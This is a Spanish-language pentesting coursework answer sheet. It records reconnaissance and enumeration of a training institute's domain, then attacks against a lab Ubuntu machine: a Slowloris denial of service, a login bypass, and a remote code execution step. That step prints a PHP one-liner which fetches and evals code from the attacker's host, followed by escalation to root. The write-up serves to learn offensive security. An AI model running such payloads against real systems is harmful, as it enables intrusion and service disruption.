Hoja de respuestas

Módulo Pentesting de activos tecnológicos

Nombre y apellidos Anyoul Guzmán

Fecha entrega 02/08/2022

1. Reconocimiento Pasivo (footprinting)

1.1 Google hacking

 Búsqueda Operador Site: Muestra 120.000 resultados con los subdominios que tiene
indexados o la presencia de la organización en la web.

 Búsqueda Operador site con operador “–“: Se observan 208.000 resultado por los subdominios
de IMG menos los que incluyamos al usar este operador.
;:….

 Búsqueda Operador Inrul: Se observa un total de 25.400 resultados, este operador permite
observar las webs que tengan el término en alguna parte de la URL y se puede combinar con
varios operadores.

 Búsqueda Operador filetype: Con un total de 161.000 resultados, este operador busca webs
que tengan expuestos ficheros con diferentes extensiones
(.pdf, .ps, .doc, .xls, .txt, .ppt, .rtf, .asp, etc.) y se puede combinar con varios operadores.
 Búsqueda Operador Allintitle e intitle: Se identifica un total de 255 registros, restringe la
búsqueda únicamente al título de la página web (aquello que está entre las etiquetas).

1.2. E-mail harvesting

 Búsqueda comando theHarvester:  Este commando permite encontrar correos electrónicos,

posibles usuarios y empleados de una organización. La recopilación de este tipo de
información es útil a la hora de obtener una lista para poder llevar a cabo ataques client-side,
mapeo de usuarios en la organización, etc.

Se utilize el commando theHarvester -d imf-formacion.com -l 20 -b all, para buscar la información

relacionada con el dominito de imf, la cantidad de resultados en todos los buscadores.
1.3.  Enumeración Whois

W2Las bases de datos whois contienen mucha información sobre la organización, dominios que

alojan, nombre del servidor, registrador y, en la mayoría de los casos, información de contacto.
 2. Reconocimiento activo (fingerprinting)

 2.1. Enumeración DNS

Se identifican dos servidores, que divulga información DNS y de servidor de correo para el
dominio sobre el que tiene autoridad. utilizando el comando host con el parámetro -t para llevar a
cabo descubrimiento tanto de servidores DNS como de servidores de correo:

Consultas DNS adicionales para el descubrimiento de hostnames y direcciones IP que

pertenecen a IMF
2.1.2. Lookup y reverse lookup

La consulta realizada anteriormente revela algunas direcciones Ip, si está configurado los registros
PTR para el dominio, se puede encontrar más nombres de dominio. Para este caso no se
encontraron más nombres de dominio.

Ip 104.26.15.226
Ip 104.26.14.226

Ip 172.67.72.49

2.1.3. Transferencias de zona DNS

Con el comando Host -t se intenta a realizar una transferencia de zona. En este caso, los
servidores de IMF están configurados apropiadamente y no se permite la transferencia de zona.

Domain server: rosalyn.ns.cloudflare.com.

Domain server: imf-formacion.com George.ns.cloudflare.com.

2.1.4. Enumeración DNS Con Herramientas Conocidas

Se realiza la prueba con el comando dnsrecon -d sobre el dominio de imf-formación.com

El comando dnsenum funciona de forma similar a dnsrecon. Intenta realizar transferencias de
zona en un dominio dado.

─(root💀kali)-[/home/kali]
└─# dnsenum imf-formacion.com
dnsenum VERSION:1.2.6

----- imf-formacion.com -----

Host's addresses:
__________________

imf-formacion.com. 300 IN A 104.26.14.226

imf-formacion.com. 300 IN A 172.67.72.49
imf-formacion.com. 300 IN A 104.26.15.226

Name Servers:
______________

george.ns.cloudflare.com. 260 IN A 172.64.33.167

george.ns.cloudflare.com. 260 IN A 108.162.193.167
george.ns.cloudflare.com. 260 IN A 173.245.59.167
rosalyn.ns.cloudflare.com. 497 IN A 172.64.34.59
rosalyn.ns.cloudflare.com. 497 IN A 108.162.194.59
rosalyn.ns.cloudflare.com. 497 IN A 162.159.38.59

Mail (MX) Servers:

___________________

imfformacion-com0i.mail.protection.outlook.com. 10 IN A 104.47.6.36
imfformacion-com0i.mail.protection.outlook.com. 10 IN A 104.47.4.36

Trying Zone Transfers and getting Bind Versions:

_________________________________________________

Trying Zone Transfer for imf-formacion.com on george.ns.cloudflare.com ...

AXFR record query failed: FORMERR

Trying Zone Transfer for imf-formacion.com on rosalyn.ns.cloudflare.com ...

AXFR record query failed: FORMERR

Brute forcing with /usr/share/dnsenum/dns.txt:

_______________________________________________
2.2. Enumeración SMB

2.2.1. Escaneando el servicio NetBIOS

Se ejecuta el comando nmap -v -p para escanear los puetos TCP y UDP 139 y 445.

Ip 104.26.15.226

┌──(root💀kali)-[/home/kali]
└─# nmap -v -p 139,445 -oG smb.txt 104.26.15.226
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-20 18:13 EST
Initiating Ping Scan at 18:13
Scanning 104.26.15.226 [4 ports]
Completed Ping Scan at 18:13, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:13
Completed Parallel DNS resolution of 1 host. at 18:13, 0.19s elapsed
Initiating SYN Stealth Scan at 18:13
Scanning 104.26.15.226 [2 ports]
Completed SYN Stealth Scan at 18:13, 1.30s elapsed (2 total ports)
Nmap scan report for 104.26.15.226
Host is up (0.00068s latency).

PORT STATE SERVICE

139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Read data files from: /usr/bin/../share/nmap

Nmap done: 1 IP address (1 host up) scanned in 1.67 seconds
Raw packets sent: 8 (328B) | Rcvd: 1 (40B)

Ip 104.26.14.226

┌──(root💀kali)-[/home/kali]
└─# nmap -v -p 139,445 -oG smb.txt 104.26.14.226 130 ⨯
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-20 18:21 EST
Initiating Ping Scan at 18:21
Scanning 104.26.14.226 [4 ports]
Completed Ping Scan at 18:21, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:21
Completed Parallel DNS resolution of 1 host. at 18:21, 0.07s elapsed
Initiating SYN Stealth Scan at 18:21
Scanning 104.26.14.226 [2 ports]
Completed SYN Stealth Scan at 18:21, 1.36s elapsed (2 total ports)
Nmap scan report for 104.26.14.226
Host is up (0.00079s latency).

PORT STATE SERVICE

139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Read data files from: /usr/bin/../share/nmap

Nmap done: 1 IP address (1 host up) scanned in 1.62 seconds
Raw packets sent: 8 (328B) | Rcvd: 1 (40B)
Ip 172.67.72.49

┌──(root💀kali)-[/home/kali]
└─# nmap -v -p 139,445 -oG smb.txt 172.67.72.49 130 ⨯
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-20 18:26 EST
Initiating Ping Scan at 18:26
Scanning 172.67.72.49 [4 ports]
Completed Ping Scan at 18:26, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:26
Completed Parallel DNS resolution of 1 host. at 18:26, 0.21s elapsed
Initiating SYN Stealth Scan at 18:26
Scanning 172.67.72.49 [2 ports]
Completed SYN Stealth Scan at 18:26, 1.25s elapsed (2 total ports)
Nmap scan report for 172.67.72.49
Host is up (0.00094s latency).

PORT STATE SERVICE

139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Read data files from: /usr/bin/../share/nmap

Nmap done: 1 IP address (1 host up) scanned in 1.67 seconds
Raw packets sent: 8 (328B) | Rcvd: 1 (40B)

2.2.2. Enumeración de sesiones NULL

Al realizar la sesión NULL se observan que los equipos no autenticados no pueden obtener listas
de navegación de otros servidores, ni exposición de información sensible de contraseñas,
nombres de usuario, nombres de grupo, nombres de equipo, Id de usuarios y de host de IMF.

 Para la ip 104.26.15.226 El servidor no permite sesiones usando nombre de usuario,

contraseña

┌──(root💀kali)-[/home/kali]
└─# enum4linux -a 104.26.15.226
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Feb 20
19:35:09 2022
==========================
| Target Information |
==========================
Target ........... 104.26.15.226
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=====================================================
| Enumerating Workgroup/Domain on 104.26.15.226 |
=====================================================
[E] Can't find workgroup/domain
=============================================
| Nbtstat Information for 104.26.15.226 |
=============================================
Looking up status of 104.26.15.226
No reply from 104.26.15.226
======================================
| Session Check on 104.26.15.226 |
======================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line
437.
[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.

 Para la ip 104.26.14.226 El servidor no permite sesiones usando nombre de usuario '',

contraseña

┌──(root💀kali)-[/home/kali]
└─# enum4linux -a 104.26.14.226 130 ⨯
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Feb 20
19:51:52 2022
==========================
| Target Information |
==========================
Target ........... 104.26.14.226
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=====================================================
| Enumerating Workgroup/Domain on 104.26.14.226 |
=====================================================
[E] Can't find workgroup/domain
=============================================
| Nbtstat Information for 104.26.14.226 |
=============================================
Looking up status of 104.26.14.226
No reply from 104.26.14.226
======================================
| Session Check on 104.26.14.226 |
======================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line
437.
[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.

 Para la ip 172.67.72.49 El servidor no permite sesiones usando nombre de usuario '',

contraseña

┌──(root💀kali)-[/home/kali]
└─# enum4linux -a 172.67.72.49 130 ⨯
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Feb 20
19:56:36 2022
==========================
| Target Information |
==========================
Target ........... 172.67.72.49
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
====================================================
| Enumerating Workgroup/Domain on 172.67.72.49 |
====================================================
[E] Can't find workgroup/domain
============================================
| Nbtstat Information for 172.67.72.49 |
============================================
Looking up status of 172.67.72.49
No reply from 172.67.72.49
=====================================
| Session Check on 172.67.72.49 |
=====================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line
437.
[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.

 2.3. Enumeración SMTP

El protocolo Simple Mail Transfer Protocol, es un protocolo de red utilizado para el intercambio de

mensajes de correo electrónico. Se ejecuta el comando nc - nv y no es posible obtener
información sobre los host objetivo.

En la transferencia de Zona DNS se identificaron las Ip de los servidores de IMF objetivos:

Domain server: rosalyn.ns.cloudflare.com.

Domain server: imf-formacion.com George.ns.cloudflare.com.

Posteriormente se ejecuta el comando nc – nv y no es posible obtener información sobre las ip de

los servidores de IMF.

2.4. Enumeración SNMP

2.4.1. Escaneando el protocolo SNMP con nmap

Ip descubiertas de IMF

Se realiza el escaneo del protocolo SNP, puerto 161, el cual se encontró abierto, para las 2 de los
servidores de IMF.

3. Escaneo

Se ejecuta "ifconfig" para conocer la ip. Posteriormente se ejecuta el comando

"netdiscover -r" para observar los equipos conectados
Se identifican 3 dispositivos conectados a la red.

3.1 Descubrimiento de Red

Con el comando nmap -sn se realiza el descubrimiento de host, para consultar un rango
de 24 direcciones ip
3.2. Descubrimiento de Servicios

Escaneo de Puertos TCP

Se realiza el escaneo de puertos en la Ip 192.168.56.1, se observa que los puertos

corresponden a servicios está disponible en Windows.

No se identifican puertos abiertos en la ip 192.168.56.100

En la ip 192.168.56.101, se identifican sólo puertos TCP abiertos: 21, 22, 25, 80, 110 y 119.

Al realizar el escaneo de los puertos UDP, no se identifica que ninguno se enucuentra

abierto
Se identifica el tipo de servicio y versión que se encuentra habilitado los puertos y su
2.4.182.4.18versión, la cual corresponde a la maquina Ubuntu.

3.3 Búsqueda de Vulnerabilidades

Al identificados los puertos abiertos en la maquina Ubuntu, se investiga por internet las
vulnerabilidades existentes en cada uno:

Puerto 21/tcp, versión vsftpd 3.0.3: solo permite que se realice una cierta cantidad de
conexiones al servidor, por lo que, al realizar repetidamente nuevas conexiones al
servidor,puede bloquear a otros usuarios legítimos para que no se conecten al servidor, si
las conexiones/IP no están limitadas.

Puerto 22/tcp, versión OpenSSH 7.2p2 Ubuntu 4ubuntu2.2

Se realizo el escaneo de vulnerabilidades con el script vuln, de Nmap, para el servidor

Ubuntu con Ip 192.168.56.101, identificando lo siguiente:

a. Para los puertos TCP abiertos 21,22 y 25 no se identifican vulnerabilidades

 b. Para el puerto TCP 80 se identificaron las siguientes vulnerabilidades

- http-slowloris-check CVE-2007-6750: El servidor HTTP Apache 1.x y 2.x permite a

atacantes remotos provocar una denegación de servicio a través de una petición
HTTP parcial.

- http-enum: Enumera los directorios utilizados por servidores y aplicaciones web

populares. Robots.txt se almacena en el directorio raíz de un dominio. Por lo tanto,
es el primer documento que abren los rastreadores cuando visitan su sitio. Sin
embargo, el archivo no solo controla el rastreo. También puede integrar un enlace a
su mapa del sitio, lo que brinda a los rastreadores de motores de búsqueda una
descripción general de todas las URL existentes de su dominio.

- http-csrf: El Cross Site Request Forgery (CSRF o XSRF) es un tipo de ataque que se
suele usar para estafas por Internet. Los delincuentes se apoderan de una sesión
autorizada por el usuario (session riding) para realizar actos dañinos. El proceso se
lleva a cabo mediante solicitudes HTTP.
c. El puerto TCP 110, se encuentra abierto y es usado por los gestores de correo,
no presenta vulnerabilidades. No presenta vulnerabilidades.

El puerto TCP 119 se encuentra abierto y es usado para entregar paquetes de datos.
No presenta vulnerabilidades.
Se realiza el escaneo con la herramienta Nessus, identificando que no presenta ninguna
vulnerabilidad crítica.

En la parte derecha superior permite exportar el reporte de las vulnerabilidades.

Archivo generado.

No presenta vulnerabilidades críticas

3.2. Explotación de Vulnerabilidades

Teniendo en cuenta que en el puerto 80 del equipo con ip 192.168.56.101 se encontraron

las vulnerabilidades CVE-2007-6750 y CSRS, se procede a usar la herramienta metasploi,
con el comando msfconsole vamos a buscar dentro de metasploit si tenemos información
sobre estas vulnerabilidades.

Buscamos información de las vulnerabilidades dentro de metasploit

CVE-2007-6750
Para esta vulnerabilidad encontrada CVE-2007-6750 con el comando use usaremos el
exploit auxiliary/dos/http/sloworis, con el comando show options, podemos ver las
opciones de configuración del exploit.

Configuramos la Ip objetivo 192.168.56.101

CSRF

3.3 Pruebas Auditoría en la Web

Explotación vulnerabilidad CSRF

Con ayuda de Google crome, indicamos la ip destino que queremos atacar, donde se
observa que existe 3 posibles formularios.

Ingresamos a la opción Bypass Login 1

Miramos si en el código fuente se encuentra el usuario y contraseña

 - A supersecret admin

Validamos las credenciales

Comprobamos que es posible ingresar

Se ingresa a la opción Bypass Login 2

Se ingresa a la opción Ping - Pong

Explotación vulnerabilidad http-enum: Robots.txt

Con ayuda del programa FileZilla el cual funciona a nivel cliente/servidor nos permite
como usuarios, conectarnos a un servidor para consultar, adquirir y manipular contenido
del mismo. Es útil si queremos tener una conexión directa a una fuente de datos sin perder
excesivo tiempo en el proceso. Si nos encontramos en el lado del servidor, podemos
facilitar acceso a usuarios para que accedan a todo el contenido que tenemos subido al
mismo, de esta manera, nos quitamos del medio rudimentarios medios, como mandar
archivos adjuntos vía mail o utilizar las famosas memorias extraíbles. Ya que podremos
gestionar quien accede y lo que pueden tocar mediante una eficaz configuración de
permisos.

Ingresamos la dirección Ip que queremos consultar y encontramos el archivo flag.txt. que

contiene la contraseña 4n0nym0us
Explotamos la vulnerabilidad Slowloris: CVE-2007-6750

En la web ingresamos a la ip 192.168.56.101, con el fin de verificar los accesos a cadaenlace

Acceso Bypass_Login_1
Bypass_Login_2

Ping - Pong

Se busca el script para la vulnerabilidad slowloris y se ejecuta.

Se indica la ip que vamos atacar

Se observa el puerto vulnerable y la ip. Posteriormente con el comando exploit se explota
la vulnerabilidad. Al ingresar a cada opción se observa que la página esta en blanco sin
ningún contenido.

Al detener el ataque, se observa que es posible ingresar nuevamente a cada enlace.

Escaneo Open VAS

Se ingresa a la opción Scan – Tasks y luego en la opción Tasks Wizard e ingresamos la ip

objetivo que queremos escanear. Luego esperamos unos minutos a que termine.
Al terminar el escaneado, para ver un scanner más completo ingresamos a la opción Scans
– Reports y nos muestra la severidad de las vulnerabilidades, en este caso 7.5 altas.

Observamos las vulnerabilidades en los puertos del objetivo.

Se muestran los puertos identificados.

Explotación Vulnerabilidad RCE

Se utiliza el comando use exploit/multi/script/web_delivery, con la ip de Kali

Se ejecuta el comando php -d allow_url_fopen=true -r
"eval(file_get_contents('http://192.168.56.102:8080/XUDdZFkDre', false,
stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));" en la ip
de la victima.

Finalmente podemos interactuar con el nuevo shell en metasploit

Se ingresa a la raíz del servidor

Se procede a darle permisos al exploit importado, y se pasa del usuario www-data al

usuario root.